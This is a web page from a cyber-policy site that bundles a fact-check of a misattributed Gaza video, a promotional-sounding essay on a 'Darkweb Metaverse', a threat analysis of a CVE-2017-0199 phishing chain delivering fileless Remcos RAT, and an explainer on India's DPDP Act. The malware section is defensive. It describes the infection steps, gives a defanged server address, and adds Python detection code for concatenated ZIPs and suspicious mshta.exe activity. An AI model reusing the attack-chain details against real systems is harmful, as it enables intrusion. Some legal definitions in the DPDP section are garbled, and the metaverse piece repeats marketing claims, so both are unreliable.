#FactCheck - "Viral Video Falsely Claimed as Evidence of Attacks in Bangladesh is False & Misleading"
Executive Summary:
A misleading video of a child covered in ash is circulating as alleged evidence of attacks against Hindu minorities in Bangladesh. However, the investigation revealed that the video is actually from Gaza, Palestine, and was filmed following an Israeli airstrike in July 2024. The claim linking the video to Bangladesh is false and misleading.
Claims:
A viral video claims to show a child in Bangladesh covered in ash as evidence of attacks on Hindu minorities.
Fact Check:
Upon receiving the viral posts, we conducted a Google Lens search on keyframes of the video, which led us to an X post by Quds News Network. The report identified the video as footage from Gaza, Palestine, specifically capturing the aftermath of an Israeli airstrike on the Nuseirat refugee camp in July 2024.
The caption of the post reads, “Journalist Hani Mahmoud reports on the deadly Israeli attack yesterday which targeted a UN school in Nuseirat, killing at least 17 people who were sheltering inside and injuring many more.”
To further verify, we examined the video footage, where the watermark of Al Jazeera News media could be seen. We found the same post on the Instagram account on 14 July 2024, where we confirmed that the child in the video had survived a massacre caused by the Israeli airstrike on a school shelter in Gaza.
Additionally, we found the same video uploaded to CBS News' YouTube channel, where it was clearly captioned as "Video captures aftermath of Israeli airstrike in Gaza", further confirming its true origin.
We found no credible reports or evidence linking this video to any incidents in Bangladesh. This clearly implies that the viral video was falsely attributed to Bangladesh.
Conclusion:
The claim that the video circulating on social media, which shows a child covered in ash, is evidence of attacks against Hindu minorities is false and misleading. The investigation shows that the video originated from Gaza, Palestine, and documents the aftermath of an Israeli airstrike in July 2024.
- Claims: A video shows a child in Bangladesh covered in ash as evidence of attacks on Hindu minorities.
- Claimed by: Facebook
- Fact Check: False & Misleading
Related Blogs
Introduction
Embark on a groundbreaking exploration of the Darkweb Metaverse, a revolutionary fusion of the enigmatic dark web with the immersive realm of the metaverse. Unveiling a decentralised platform championing freedom of speech, the Darkverse promises unparalleled diversity of expression. However, as we delve into this digital frontier, we must tread cautiously, acknowledging the security risks and societal challenges that accompany the metaverse's emergence.
The Dark Metaverse is a unique combination of the mysterious dark web and the immersive digital world known as the metaverse. Imagine a place where users may participate in decentralised social networking, communicate anonymously, and freely express a range of viewpoints. It aims to provide an alternative to traditional online platforms, emphasizing privacy and freedom of speech. Nevertheless, it also brings new kinds of criminality and security issues, so it's important to approach this digital frontier cautiously.
In the vast expanse of the digital cosmos, there exists a realm that remains shrouded in mystery to the casual netizen—the dark web. It is a place where the surface web, the familiar territory of Google searches and social media feeds, constitutes a mere 5 per cent of the information iceberg floating in an ocean of data. Beneath this surface lies the deep web and the dark web, comprising the remaining 95 per cent, a staggering figure that beckons the brave and curious to explore its abysmal depths.
Imagine a platform that not only ventures into these depths but intertwines them with the emerging concept of the metaverse—a digital realm that defeats the limitations of the physical world. This is the vision of the Darkweb Metaverse, the world’s premier endeavour to harness the enigmatic depths of the dark web and fuse it into the immersive experience of the metaverse.
As per Internet User Statistics 2024, there are over 5.3 billion Internet users in the world, meaning over 65% of the world’s population has access to the Internet. The Internet is used for various services: news, entertainment, and communication, to name a few. The citizens of developed countries depend on the World Wide Web for a multitude of daily tasks such as academic research, online shopping, e-banking, accessing news and even ordering food online; hence the Internet has become an integral part of our daily lives.
Surface Web
This layer of the internet is used by the general public on a daily basis. The contents of this layer are accessed through standard web browsers such as Google Chrome and Mozilla Firefox, and they are indexed by search engines.
Deep Web
This is the second layer of the internet; its contents are not indexed by search engines. Content that is unavailable on the surface web is considered to be part of the deep web. The deep web comprises a collection of various types of confidential information. Schools, universities, institutes, government offices and departments, multinational companies (MNCs), and private companies store their database and server information on intranets, which are part of the deep web. This includes online profile and account usernames or IDs, passwords or login credentials, premium subscription data, and monetary transaction records.
Dark Web
It is the least explored part of the internet and is considered to be a hub of various bizarre activities. The contents of the dark web are not indexed by search engines, and specific software is required to access this layer of the internet, namely the TOR (The Onion Router) browser, which cloaks the identity of its users, making them anonymous. Dark web websites are identified by the .onion TLD (Top Level Domain). Due to the anonymity provided in this layer, various criminal activities take place there, ranging from drug trading, arms trading, and the sale of illegal PayPal account details to websites offering child pornography.
The Darkverse
The Darkweb Metaverse is not a mere novelty; it is a revolutionary step forward, a decentralised social networking platform that stands in stark contrast to centralised counterparts like YouTube or Twitter. Here, the spectre of censorship is banished, and the freedom of speech reigns supreme.
The architectonic prowess behind the Darkweb Metaverse is formidable. The development team is a coalition of former infrastructure maestros from Theta Network and virtuosos of metaverse design, bolstered by backend engineers from Gensokishi Metaverse. At the helm is a CEO whose tenure at the apex of large Japanese companies has endowed him with a profound understanding of the landscape, setting a solid foundation for the platform's future triumphs.
Financially, the dark web has been a flourishing underworld, with revenues ranging from $1.5 billion to $3.1 billion between 2020 and 2022. Darkverse, with its emphasis on user-friendliness and safety, is poised to capture a significant portion of this user base. The platform serves as a truly decentralised amalgamation of the Dark Web, Metaverse, and Social Networking Services (SNS), with a mission to provide an unassailable bastion for freedom of speech and expression.
The Darkweb Metaverse is not merely a sanctuary for anonymity and privacy; it is a crucible for the diversity of expression. In a world where centralised platforms can muzzle voices, Darkverse stands as a bulwark against such suppression, fostering a community where a kaleidoscope of opinions and information thrives. The ease of use is unparalleled—a one-time portal that obviates the need for third-party software to access the dark web, protecting users from the myriad risks that typically accompany such ventures.
Moreover, the platform's ability to verify the authenticity of information is a game-changer. In an era laced with misinformation, especially surrounding contentious issues like war, Darkverse offers a sign of truth where the source of information can be scrutinised for its accuracy.
Integrating Technologies
The metaverse will be an immersive iteration of the internet, decked with interactive features of emerging technologies such as artificial intelligence, virtual and augmented reality, 3D graphics, 5G, holograms, NFTs, blockchain and haptic sensors. Each building block, while innovative, carries its own set of risks—vulnerabilities and design flaws that could pose a serious threat to the integrated meta world.
The dark web's very nature of interaction through avatars makes it a perfect candidate for a metaverse iteration. Here, in this anonymous world, commercial and personal engagements occur without the desire to unveil real identities. The metaverse's DNA is well-suited to the dark web, presenting a formidable security challenge as it is likely to evolve more rapidly than its real-world counterpart.
While Meta (formerly Facebook) is a prominent entity developing the metaverse, other key players include NVIDIA, Epic Games, Microsoft, Apple, Decentraland, Roblox Corporation, Unity Software, Snapchat, and Amazon. These companies are integral to constructing the vast network of real-time 3D virtual worlds where users maintain their identities and payment histories.
Yet, with innovation comes risk. The metaverse will necessitate police stations, not as a dystopian oversight but as a means to address the inherent challenges of a new digital society. In India, for instance, the integration of law enforcement within the metaverse could revolutionize the public's interaction with the police, potentially increasing the reporting of crimes.
The Perils within the Darkverse
The metaverse will also be a fertile ground for crimes of a new dimension—identity theft, digital asset hijacking, and the influence of metaverse interactions on real-world decisions. With a significant portion of social media profiles potentially being fraudulent, the metaverse amplifies these challenges, necessitating robust identity access management.
The integration of NFTs into the metaverse ecosystem is not without its security concerns, as token breaches and hacks remain a persistent threat. The metaverse's parallel economy will test the developers' ability to engender trust, a Herculean task that will challenge the boundaries of national economies.
Moreover, the metaverse will be a crucible for social engineering-based attacks, where the real-time and immersive nature of interactions could make individuals particularly vulnerable to deception and manipulation. The potential for early-stage fraud, such as the hyping and selling of virtual assets at unrealistic prices, is a stark reality.
The metaverse also presents numerous risks, particularly for children and adolescents who may struggle to distinguish between virtual and real worlds. The implications of such immersive experiences are intense, with the potential to influence behaviour in hazardous ways.
Security risks extend to the technologies supporting the metaverse, such as virtual and augmented reality. The exploitation of biometric data, the bridging of virtual and real worlds, and the tendency for polarisation and societal isolation are all issues requiring immediate attention.
A Way Forward
As we stand on the cusp of this new digital frontier, it is evident that the metaverse, despite its reliance on blockchain, is not immune to the privacy and security breaches that have plagued conventional IT infrastructure. Data security, identity theft, network security, and ransomware attacks are just a few of the challenges on the way.
In this quest into the unknown, the Darkweb Metaverse radiates with the promise of freedom and the thrill of discovery. Yet, as we navigate these shadowy depths, we must remain vigilant, for the very technologies that empower us also rear the seeds of our grim vulnerabilities. The metaverse is not just a new chapter in the story of the internet—it is a whole narrative, one that we must write with caution and care.
References
- https://spores.medium.com/the-worlds-first-platform-to-deploy-the-dark-web-in-the-metaverse-releap-ido-on-spores-launchpad-a36387b184de
- https://www.makeuseof.com/how-hackers-sell-trade-data-in-metaverse/
- https://www.demandsage.com/internet-user-statistics/#:~:text=There%20are%20over%205.3%20billion,has%20access%20to%20the%20Internet.
Introduction
Attackers recently used the CVE-2017-0199 vulnerability in Microsoft Office to deliver a fileless form of the Remcos RAT. The Remcos RAT gives the attacker full control of the systems infected by this malware. This research gives a detailed technical description of the vulnerability, the attack vector, and the tactics used, together with practical steps to counter the identified risks.
The Targeted Malware: Remcos RAT
Remcos RAT (Remote Control & Surveillance) is a commercially available remote access tool designed for legitimate administrative use. However, it has been widely adopted by cybercriminals for its stealth and extensive control capabilities, enabling:
- System control and monitoring
- Keylogging
- Data exfiltration
- Execution of arbitrary commands
The fileless variant utilised in this campaign makes detection even more challenging by running entirely in system memory, leaving minimal forensic traces.
Attack Vector: Phishing with Malicious Excel Attachments
The attack begins with a phishing email that appears to be legitimate business communication, such as a purchase order or invoice. This email contains an Excel attachment that is weaponized to exploit the CVE-2017-0199 vulnerability.
Technical Analysis: CVE-2017-0199 Exploitation
Vulnerability Assessment
- CVE-2017-0199 is a Remote Code Execution (RCE) vulnerability in Microsoft Office which uses Object Linking and Embedding (OLE) objects.
- Affected Components:
  - Microsoft Word
  - Microsoft Excel
  - WordPad
- CVSS Score: 7.8 (High Severity)
Mechanism of Exploitation
The vulnerability enables attackers to craft a malicious document that, when opened, fetches and executes an external payload via an HTML Application (HTA) file. The execution process occurs without requiring user interaction beyond opening the document.
Detailed Exploitation Steps
- Phishing Email and Malicious Document
  - The email contains an Excel file designed to make use of CVE-2017-0199.
  - When the attachment is opened, the document automatically connects to a remote server (e.g., 192.3.220[.]22) to download an HTA file (cookienetbookinetcache.hta).
- Execution via mshta.exe
  - The downloaded HTA file is executed using mshta.exe, a legitimate Windows process for running HTML Applications.
  - This execution is seamless and does not prompt the user, making the attack stealthy.
- Multi-Layer Obfuscation
  - The HTA file is wrapped in several layers of scripting, including:
    - JavaScript
    - VBScript
    - PowerShell
  - This obfuscation helps evade static analysis by traditional antivirus solutions.
- Fileless Payload Deployment
  - The downloaded executable leverages process hollowing to inject malicious code into legitimate system processes.
  - The Remcos RAT payload is loaded directly into memory, avoiding the creation of files on disk.
Fileless Malware Techniques
1. Process Hollowing
The attack replaces the memory of a legitimate process (e.g., explorer.exe) with the malicious Remcos RAT payload. This allows the malware to:
- Evade detection by blending into normal system activity.
- Run with the privileges of the hijacked process.
2. Anti-Analysis Techniques
- Anti-Debugging: Detects the presence of debugging tools and terminates malicious processes if found.
- Anti-VM and Sandbox Evasion: Ensures execution only on real systems to avoid detection during security analysis.
3. In-Memory Execution
- By running entirely in system memory, the malware avoids leaving artifacts on the disk, making forensic analysis and detection more challenging.
Capabilities of Remcos RAT
Once deployed, Remcos RAT provides attackers with a comprehensive suite of functionalities, including:
- Data Exfiltration:
  - Stealing system information, files, and credentials.
- Remote Execution:
  - Running arbitrary commands, scripts, and additional payloads.
- Surveillance:
  - Enabling the camera and microphone.
  - Capturing screen activity and clipboard contents.
- System Manipulation:
  - Modifying Windows Registry entries.
  - Controlling system services and processes.
  - Disabling user input devices (keyboard and mouse).
Advanced Phishing Techniques in Parallel Campaigns
1. DocuSign Abuse
Attackers exploit legitimate DocuSign APIs to create authentic-looking phishing invoices. These invoices can trick users into authorising payments or signing malicious documents, bypassing traditional email security systems.
2. ZIP File Concatenation
By appending multiple ZIP archives into a single file, attackers exploit inconsistencies in how different tools handle these files. This allows them to embed malware that evades detection by certain archive managers.
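The inconsistency described above can be checked on the defensive side by counting End of Central Directory records instead of trusting a single reader. The following is an added example, not code from the referenced research; it handles plain (non-ZIP64) archives, and the file names and contents are constructed, harmless placeholders.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"  # End of Central Directory (EOCD) record
CDH_SIG = b"PK\x01\x02"   # central directory file header
EOCD_MIN = 22             # EOCD size without the trailing comment


def make_zip(files):
    """Build a ZIP archive in memory from a {name: bytes} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def find_archives(blob):
    """Locate every archive in blob by walking its EOCD records.

    A signature hit only counts if the central directory it describes
    sits directly in front of it, which filters out chance matches
    inside compressed data.
    """
    found = []
    pos = blob.find(EOCD_SIG)
    while pos != -1:
        if pos + EOCD_MIN <= len(blob):
            entries, cd_size, cd_offset = struct.unpack_from("<HII", blob, pos + 10)
            (comment_len,) = struct.unpack_from("<H", blob, pos + 20)
            cd_start = pos - cd_size
            start = cd_start - cd_offset  # where this archive begins in blob
            if start >= 0 and (entries == 0 or blob[cd_start:cd_start + 4] == CDH_SIG):
                found.append({"start": start,
                              "end": pos + EOCD_MIN + comment_len,
                              "entries": entries})
        pos = blob.find(EOCD_SIG, pos + 1)
    return found


def default_reader_view(blob):
    """Member names as seen by a reader that uses only the last EOCD."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


def full_view(blob):
    """Member names of every embedded archive, in file order."""
    views = []
    for arc in find_archives(blob):
        with zipfile.ZipFile(io.BytesIO(blob[arc["start"]:arc["end"]])) as zf:
            views.append(zf.namelist())
    return views


def is_concatenated(blob):
    """True when the blob holds more than one complete archive."""
    return len(find_archives(blob)) > 1


# Constructed, harmless sample data.
FIRST = make_zip({"invoice.txt": b"Purchase order 0001\n"})
SECOND = make_zip({"hidden.bin": b"constructed placeholder content\n"})
COMBINED = FIRST + SECOND

if __name__ == "__main__":
    print("default reader:", default_reader_view(COMBINED))
    print("all archives:  ", full_view(COMBINED))
    print("concatenated:  ", is_concatenated(COMBINED))
```

A scanner or mail gateway that flags any attachment for which `is_concatenated` is true, or inspects every archive returned by `full_view`, does not depend on which archive a particular tool chooses to show.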
Broader Implications of Fileless Malware
Fileless malware like Remcos RAT poses significant challenges:
- Detection Difficulties: Traditional signature-based antivirus systems struggle to detect fileless malware, as there are no static files to scan.
- Forensic Limitations: The lack of disk artifacts complicates post-incident analysis, making it harder to trace the attack's origin and scope.
- Increased Sophistication: These campaigns demonstrate the growing technical prowess of cybercriminals, leveraging legitimate tools and services for malicious purposes.
Mitigation Strategies
- Patch Management
  - It is important to regularly update software to address known vulnerabilities like CVE-2017-0199. Microsoft released a patch for this vulnerability in April 2017.
- Advanced Email Security
  - It is important to implement email filtering solutions that can detect phishing attempts, even those using legitimate services like DocuSign.
- Endpoint Detection and Response (EDR)
  - Always use EDR solutions to monitor for suspicious behavior, such as unauthorized use of mshta.exe or process hollowing.
- User Awareness and Training
  - Educate users about phishing techniques and the risks of opening unexpected attachments.
- Behavioral Analysis
  - Deploy security solutions capable of detecting anomalous activity, even if no malicious files are present.
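The mshta.exe monitoring recommended above can be expressed as behavioural rules over process-creation telemetry. This is an added example, not taken from the cited analyses: the events are constructed, use the Sysmon Event ID 1 field names `Image`, `ParentImage`, `CommandLine` and `ProcessId`, and the rule names are hypothetical.

```python
import ntpath
import re

# Office components the page lists as affected by CVE-2017-0199.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "wordpad.exe"}
# Interpreters matching the script layers described for the HTA stage.
SCRIPT_CHILDREN = {"powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def _name(path):
    """Lower-cased executable name from a Windows path (works on any OS)."""
    return ntpath.basename(path or "").lower()


def evaluate(event):
    """Return the names of the rules a single process-creation event matches."""
    image = _name(event.get("Image"))
    parent = _name(event.get("ParentImage"))
    cmdline = event.get("CommandLine", "")
    hits = []
    # Rule 1: an Office application starts mshta.exe.
    if image == "mshta.exe" and parent in OFFICE_PARENTS:
        hits.append("office_spawns_mshta")
    # Rule 2: mshta.exe is pointed at a remote HTA.
    if image == "mshta.exe" and REMOTE_URL.search(cmdline):
        hits.append("mshta_remote_url")
    # Rule 3: mshta.exe starts a script host. This looks only at what
    # mshta.exe launches, so it still fires when rules 1 and 2 do not.
    if parent == "mshta.exe" and image in SCRIPT_CHILDREN:
        hits.append("mshta_spawns_script_host")
    return hits


def triage(events):
    """Return (ProcessId, [rule, ...]) for every event that matches a rule."""
    alerts = []
    for event in events:
        hits = evaluate(event)
        if hits:
            alerts.append((event["ProcessId"], hits))
    return alerts


# Constructed events; 203.0.113.10 is a documentation-range address.
SAMPLE_EVENTS = [
    {"ProcessId": 3980,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'EXCEL.EXE "C:\Users\demo\Downloads\order.xls"'},
    {"ProcessId": 4120,
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "mshta.exe http://203.0.113.10/sample.hta"},
    {"ProcessId": 4388,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden"},
    {"ProcessId": 5012,  # local HTA started by a user: no rule matches
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Tools\inventory.hta"},
]

if __name__ == "__main__":
    for pid, rules in triage(SAMPLE_EVENTS):
        print(pid, ", ".join(rules))
```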
Conclusion
The attack via CVE-2017-0199 was used to inject a new fileless variant of Remcos RAT, showing how threats are becoming more and more sophisticated. Thanks to the improved obfuscation and the absence of files on disk, the attackers evade traditional antivirus protection and gain full control over the infected computers. The threat is real, and organisations must make sure that they apply patches on time, deploy better detection technologies, and make users more wary of such threats.
References
- Fortinet FortiGuard Labs: Analysis by Xiaopeng Zhang
- Perception Point: Research on ZIP File Concatenation
- Wallarm: DocuSign Phishing Analysis
- Microsoft Security Advisory: CVE-2017-0199
Introduction
The nation got its first consolidated data protection regulation in the form of the Digital Personal Data Protection Act, 2023, in the month of August, and the Indian netizens got their independence in terms of data protection and privacy. The act lays down heavy penalties for non-compliance with its provisions, and enforcement is under the jurisdiction of a Data Protection Board set up by the Central Government, which enjoys powers equivalent to a civil court. The act upholds the right to data privacy as a fundamental right under Article 19 (1)(A) and 21 of the Constitution of India. The same has been judicially supported in the form of the landmark judgement, Justice K.S. Puttaswamy vs. Union of India of 2018. Let us take a look at the impact the act will make on the Indian netizens.
What is Personal Data?
Personal Data refers to any form of digitised data which can be directly replicated by any person. This includes email IDs, mobile numbers, health data, banking data, photos, etc. A person to whom the personal data belongs is called the Data Principal. A Data Principal is anyone who is above the age of 18 years and consents to the data of children/minors. In the case of children/minors, it is mandatory for the parents or guardians to provide their express consent for the processing of personal data for all or any purposes. Any individual who is processing personal data is known as the Data Fiduciary, and individuals registered under the act may act as consent managers to make the consent transparent. When it comes to the rights of the netizens, it is seen that the act is created with an aspect of “Safety by Design” to secure the rights and responsibilities of the netizens.
Rights secured under the DPDP Act 2023
- Right to Grievance Redressal: The Data fiduciary and the consent manager are required to respond to the grievances of the Data Principal within a time period, which is soon to be prescribed, thus creating a blanket of responsibility for the data fiduciary and consent manager.
- Right to Nominate: Data Principals have the right to nominate any other individual who shall, in the event of death or incapacity of the data principal, exercise his/her rights.
- Right to access to information: The Data principal has the right to seek confirmation from Data fiduciaries regarding the processing of their personal data and the summary of the processed data as well.
- Right to Erasure and Correction: Data principals can reach out to the data fiduciaries in order to exercise their right to correct, complete, update and erasure of their personal data.
- Territorial Rights: The data is to be processed within India, and processing outside India should be in regard to the services provided in India.
- Material Rights: The rights are applicable to any personal data collected in digitised form and also for the data collected in a non-digital form but subsequently digitised.
Obligations for Data Fiduciaries
The data fiduciaries are mandated to comply with the following provisions in order to remain compliant with the laws of the land and to secure the digital rights of the netizens.
These are the obligations of the data fiduciaries:
- Implement technical and organisational measures to safeguard Personal Data.
- Determine the legal grounds for processing and obtaining consent from Data principals where required.
- Provide a privacy notice while obtaining consent from Data principals.
- Implement a mechanism for data principals to exercise their rights.
- Implement a grievance redressal mechanism for handling the queries from Data principals.
- Irrecoverably delete personal data after the purpose for which it was collected has expired or when the consent has been withdrawn.
- Have a breach management policy to notify the data protection board and the data principals in accordance with prescribed timelines.
- Sign a valid contract with Data processors to ensure key obligations are abided by them, including timely deletion of data.
Conclusion
As the world steps into the digital age, it is pertinent for the governments of the world to come up with efficient and effective legislation to protect cyber rights and responsibilities, but as cyberspace has no boundaries, nations need to work in synergy to protect their cyber interests and netizens. This can only begin once all nations have indigenous cyber laws and rights to protect netizens, and the same has been addressed by the Indian Government in the form of the Digital Personal Data Protection Act, 2023. The future is full of emerging technologies and the evolution of cyber laws; hence, consolidating a basic legal structure now is of utmost importance, and the same is expected to be strengthened in India by the soon-to-be-released Draft Digital India Bill.